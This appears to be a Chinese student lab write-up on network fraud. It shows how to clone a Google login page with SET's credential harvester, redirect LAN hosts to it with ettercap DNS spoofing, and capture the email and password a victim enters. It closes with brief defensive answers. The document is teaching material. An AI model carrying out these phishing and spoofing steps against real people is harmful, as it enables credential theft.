zoukankan      html  css  js  c++  java
  • Exp7 网络欺诈防范

    实践内容

    本实践的目标理解常用网络欺诈背后的原理,以提高防范意识,并提出具体防范方法。具体实践有:

    简单应用SET工具建立冒名网站

    设置apache服务器的监听端口(默认80一般不用修改)

    sudo vi /etc/apache2/ports.conf
    

    开启服务。

    sudo apachectl start
    

    Setoolkit是一个开源的社会工程学工具包,打开Setoolkit。

    setoolkit
    

    使用方法与其他集成工具大同小异,这里按所需选择选项即可,我的选择是:

    Social-Engineering Attack
    Website Attack Vectors
    Credential Harvester Attack Method
    

    也就是生成冒名的登录界面网站,网站可以外部导入也可以选择使用模板,我的选择是使用模板。

    Web Templates
    

    接着依次输入攻击机ip,选着生成的网页模板(我选择的是google),即可生成google登录的冒名网站。

    接着在靶机中输入攻击机的地址,即可浏览冒名网站。

    输入邮箱和密码进行登录,即可在攻击机中抓到邮箱和密码。

    ettercap DNS spoof

    使用命令将网卡设置为混杂模式,确保能接收所有经过这个网卡的数据流。

    ifconfig eth0 promisc
    

    修改dns缓存,在重定向网站中加入百度网站,重定向ip为攻击机IP。

    leafpad /etc/ettercap/etter.dns
    

    使用命令启用ettercap发动攻击

    ettercap -i eth0 -T -q -P dns_spoof /// /// (命令不熟悉可以使用GUI)
    

    这里用到的参数:

    -i:指定网卡
    -T:启用文本GUI
    -q:不将抓到的包数据显示在命令行
    -P:选择插件,这里选择的是dns_spoof
    /// ///:这里的意思是攻击局域网内所有主机,当然也可以指定靶机ip和网关。
    

    然后在靶机中输入命令:

    ping www.baidu.com
    

    在攻击机中可以发现靶机已被欺骗,靶机中再次ping百度就是攻击机的地址

    结合应用两种技术,用DNS spoof引导特定访问到冒名网站

    这里以google为例,先生成google冒名登录网站,然后通过dns spoof,将google域名与攻击机ip匹配,这样当靶机访问google时,通过dns解析后,就会访问到goolge冒名登录网站,这时靶机中输入邮箱和密码登录,在攻击机中能抓到对应信息。

    问题回答

    1.通常在什么场景下容易受到DNS spoof攻击
    答:攻击者能够比较轻松进入受害者网段的情况下,如公共网络。
    在日常生活工作中如何防范以上两攻击方法
    答:不随便点击钓鱼连接,访问网址时可以直接输入官方ip访问,而不是通过域名访问。

    心得体会

    集成工具的出现使得网络诈骗的成本更为低廉,在平时上网过程中需更为谨慎。

  • 相关阅读:
    62. 不同路径-dp-中等
    49. 字母异位词分组-字符串-中等
    34. 在排序数组中查找元素的第一个和最后一个位置-二分查找-中等
    33. 搜索旋转排序数组-二分查找-中等
    221. 最大正方形-dp-中等难度
    38. 外观数列-字符串-中等难度
    mysql-索引/视图/存储过程/函数/触发器
    mysql-常用命令
    MDK5.34发布,AC6升级至V6.16(2021-03-19)
    STM32H7的CAN FD教程笔记
  • 原文地址:https://www.cnblogs.com/luoleqi/p/12895834.html
Copyright © 2011-2022 走看看